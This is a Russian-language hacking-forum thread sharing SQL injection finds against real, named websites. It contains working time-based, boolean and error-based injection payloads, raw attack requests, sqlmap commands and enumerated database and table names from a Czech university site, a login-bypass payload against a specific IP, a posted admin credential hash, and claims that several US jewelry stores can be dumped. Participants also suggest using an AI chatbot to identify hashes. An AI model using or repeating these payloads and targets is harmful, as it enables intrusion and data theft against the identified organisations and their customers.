• XSS.stack #1 – первый литературный журнал от юзеров форума

Найденные интересеные SQL inj & XSS

Отслеживать
magically сказал(а):
https://sorgenlos.de/ - дайте совет (POST (multipart) input ka was set to 10'XOR(1*if(now()=sysdate(),sleep(6),0))XOR'Z )
Код: 
POST /de/anzeige.php?eid=service HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://sorgenlos.de/
Cookie: PHPSESSID=e5554ba43f673980f36c0c19a0b31c42; cookieok=1; eid=service
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
Content-Length: 448
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: sorgenlos.de
Connection: Keep-alive


------------YWJkMTQzNDcw
Content-Disposition: form-data; name="show"


1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="eid"


service
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="l"


DE
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="d"


1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ka"


10'XOR(1*if(now()=sysdate(),sleep(6),0))XOR'Z
------------YWJkMTQzNDcw--
советую не сканить всякое фуфло и не оставлять линк на таргет
 
Код: 
GET /php/RST/cz/1'"1000 HTTP/1.1
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000
Cookie: muni-cookies=mc-analytics%2cmc-socials%2cmc-marketing%7c4b94201d-b048-4080-a785-fcc7edd0f6f7%2cmc-analytics%2cmc-socials%2cmc-marketing%2cmc-analytics%2cmc-socials%2cmc-marketing%7c0a1f5b02-54c5-4ce1-b138-7ade4c68460f%2cmc-analytics%2cmc-socials%2cmc-marketing%7cfa7d1d9f-a8d0-4f05-b655-f6f1e1a5ae1e%2cmc-analytics%2cmc-socials%2cmc-marketing%7ce6b493a2-816d-4b55-ad59-784a19767adb; _fbp=fb.1.1745359329965.969499379863111326; obc=1; c3fb0ca2faa55b1312a37edfdd373a86=kvl7935hh41q5hoatocib6utv0; PHPSESSID=illgd6nr9emvl65e0tbu695uh2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sci.muni.cz
Connection: Keep-alive

Код: 
sqlmap.py -r request.txt --dbms=MySQL --technique=ET --dbs

available databases [3]:
[*] information_schema
[*] RS2011
[*] test


Код: 
Database: RS2011
[41 tables]
+------------------+
| Adresa           |
| Aktuality        |
| BMObory          |
| Bloky            |
| Budova           |
| Clanky           |
| ClenoveRad       |
| DSObory          |
| DSObory_zaloha   |
| DSPrace          |
| DSPrace_save     |
| DSProgramy       |
| EmailSkup        |
| EmailSkupList    |
| Galerie          |
| GaleriePolozky   |
| Kancelar         |
| Kancelar_new     |
| Menu             |
| ObjSelect        |
| ObjSelectPolozky |
| Osoby            |
| Param            |
| Pocitadlo        |
| Pracoviste       |
| Prava            |
| PravaUstavu      |
| PristupStranka   |
| Projekty         |
| Publikace        |
| PublikaceMain    |
| Sekretarky       |
| Stranky          |
| Studenti         |
| Texty            |
| Vedouci          |
| VlozText         |
| Vyveska          |
| Zamestnanci      |
| Reference        |
| email            |
+------------------+
 
Код: 
www.uzmanbros.com/products.php?id=92
[INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="oz")
[INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=92' AND 1451=1451 AND 'yQcu'='yQcu

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=92' AND EXTRACTVALUE(7720,CONCAT(0x5c,0x71717a7671,(SELECT (ELT(7720=7720,1))),0x7162707071)) AND 'Vdep'='Vdep

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=92' AND (SELECT 2523 FROM (SELECT(SLEEP(5)))AiLQ) AND 'dQry'='dQry
 
Последнее редактирование:
havarz сказал(а):
admin:4ff1cc9e68281addeacd19c6ee3e86c32be6bceee4455d3f2
Хэш не определил. Админку не нашел... :(
хеши хорошо определяет дипсик, особенно если есть варик в их системе генерить хеш с известным значением и дать ей 2 хеша
 
martinbinder.com

Top Jewelry Stores | Martin Binder Jeweler

Shop Martin Binder Jeweler, Valparaiso’s top jewelry store, for fine diamonds, luxury jewelry, and designer collections.
martinbinder.com martinbinder.com

Bachendorf's | Finest Designer Jewelry in Dallas & Fort Worth, TX

Luxury designer jewelry store in Dallas and Fort Worth, TX. Bachendorf's is an official Rolex Jewelers and offers the finest hand-selected diamonds and watches.
www.bachendorfs.com www.bachendorfs.com

King's Jewelry in Ohio | Diamond Engagement and Wedding Rings

www.kingsjewelry.com www.kingsjewelry.com

Судя по всему это какая то 1 кастомная кмс, окунь выдает на них скули, мапа подтверждает и дампит. Так же замечено еще 5+ ювелирок на их кмс с посещалкой, подозреваю что их кудааааа больше. Если найдете способ искать их кмс то там наверняка есть что то очень ценное
 
kosh_e4ka сказал(а):
martinbinder.com

Top Jewelry Stores | Martin Binder Jeweler

Shop Martin Binder Jeweler, Valparaiso’s top jewelry store, for fine diamonds, luxury jewelry, and designer collections.
martinbinder.com martinbinder.com

Bachendorf's | Finest Designer Jewelry in Dallas & Fort Worth, TX

Luxury designer jewelry store in Dallas and Fort Worth, TX. Bachendorf's is an official Rolex Jewelers and offers the finest hand-selected diamonds and watches.
www.bachendorfs.com www.bachendorfs.com

King's Jewelry in Ohio | Diamond Engagement and Wedding Rings

www.kingsjewelry.com www.kingsjewelry.com

Судя по всему это какая то 1 кастомная кмс, окунь выдает на них скули, мапа подтверждает и дампит. Так же замечено еще 5+ ювелирок на их кмс с посещалкой, подозреваю что их кудааааа больше. Если найдете способ искать их кмс то там наверняка есть что то очень ценное
А где PoC ?
 
etc/passwd сказал(а):
А где PoC ?
зачем тебе пок? все предельно ясно. нашел способ искать их кмс - кинул в окуня - получил скули - дампишь. я не настолько озверевший альтрусит чтобы писать поки и уж тем более думать за людей как бы им эти шопы найти. тем более ювелирки и тем более по юсе. вот мнфа на общее - дальше что хотите с ней делайте
 
kosh_e4ka сказал(а):
зачем тебе пок? все предельно ясно. нашел способ искать их кмс - кинул в окуня - получил скули - дампишь. я не настолько озверевший альтрусит чтобы писать поки и уж тем более думать за людей как бы им эти шопы найти. тем более ювелирки и тем более по юсе. вот мнфа на общее - дальше что хотите с ней делайте
Эта тема не для заработка. Посмотри название.

Найденные интересеные SQL inj & XSS​

Для меня это значит инъекция с waf, который ты смог обойти и поделился знаниями с людьми, а не просто выложил 3 домена и сказал, что там есть уязвимости - ищите сами.
 
etc/passwd сказал(а):

Найденные интересеные SQL inj & XSS​

Именно. Sql интересная потому что в юсе в ювелирке, а так же потому что sql эта не в конкретном шопе, а в какой то кастом непопулярной кмс. Sql найдена окунем и подтверждена мапой. Мой пост соответствует теме раздела это раз. Два - у меня нет желания еще раз кидать их в сканер после его очистки, а потом ждать пока time based сдампит базы и таблицы. Вспомни свои детские воспоминания которые связаны с подарками, в них ты возможно откопаешь такую фразу своих родителей: Дареному коню в зубы не смотрят. Хотя судя по твоему сообщению тебе такое в детстве не рассказывали.
 
kosh_e4ka сказал(а):
martinbinder.com

Top Jewelry Stores | Martin Binder Jeweler

Shop Martin Binder Jeweler, Valparaiso’s top jewelry store, for fine diamonds, luxury jewelry, and designer collections.
martinbinder.com martinbinder.com

Bachendorf's | Finest Designer Jewelry in Dallas & Fort Worth, TX

Luxury designer jewelry store in Dallas and Fort Worth, TX. Bachendorf's is an official Rolex Jewelers and offers the finest hand-selected diamonds and watches.
www.bachendorfs.com www.bachendorfs.com

King's Jewelry in Ohio | Diamond Engagement and Wedding Rings

www.kingsjewelry.com www.kingsjewelry.com

Судя по всему это какая то 1 кастомная кмс, окунь выдает на них скули, мапа подтверждает и дампит. Так же замечено еще 5+ ювелирок на их кмс с посещалкой, подозреваю что их кудааааа больше. Если найдете способ искать их кмс то там наверняка есть что то очень ценное
 
POST /student/ HTTP/1.1
Host: 131.153.147.98:443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Origin: https://131.153.147.98
Referer: https://131.153.147.98/student/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

adm_no=%22%3D%22or%27%3D%27&pass=%22%3D%22or%27%3D%27&btn=Login

1751817072663.png
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх